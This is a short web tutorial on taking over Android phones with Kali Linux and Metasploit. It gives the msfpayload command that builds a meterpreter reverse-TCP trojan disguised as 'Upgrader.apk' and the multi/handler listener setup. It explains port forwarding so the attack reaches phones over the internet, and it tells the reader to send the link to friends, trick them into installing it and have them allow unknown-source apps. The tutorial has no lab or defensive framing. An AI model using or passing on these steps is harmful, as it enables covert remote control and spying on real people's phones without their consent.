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How To Hack Android Using Kali |
Hack Android With kali, Hack Android With Metasploit, Android Exploit, New Android hacking, Android trozen, Android Hack With kali
In this Tutorial You will be guided How to Hack Android Using Kali. This a completely noob friendly tutorial . With Pics in each steps.
In this Tutorial You will be guided How to Hack Android Using Kali. This a completely noob friendly tutorial . With Pics in each steps.
Step 1: Fire-Up Kali:
- Open a terminal, and make a Trojan .apk
- You can do this by typing :
- msfpayload android/meterpreter/reverse_tcp LHOST= R > /root/Upgrader.apk(replace LHOST with your own IP)
- You can also hack android on WAN i.e. through Interet by using yourPublic/External IP in the LHOST and by port forwarding
Step 2: Open Another Terminal:
- Open another terminal until the file is being produced.
- Load metasploit console, by typing : msfconsole
Step 3: Set-Up a Listener:
- After it loads(generally takes some time), load the multi-handler exploit by typing :use exploit/multi/handler
- Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp
- To set L host type : set LHOST (Even if you are hacking on WAN type your private/internal IP here not the public/external)
Step 4: Exploit!
- At last type: exploit to start the listener.
- Copy the application that you made (Upgrader.apk) from the root folder, to you android phone.
- Then send it using Uploading it to Dropbox or any sharing website (like:http://www.speedyshare.com).
- Then send the link that the Website gave you to your friends and exploit their phones (Only on LAN, but if you used the WAN method then you can use the exploit anywhere on the INTERNET)
* Let the Victim install the Up grader app(as he would think it is meant to upgrade some features on his phone)
* However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) from the security settings of the android phone to allow the Trojan to install.
* And when he clicks Open…
Step 5: BOOM!
There comes the meterpreter prompt:
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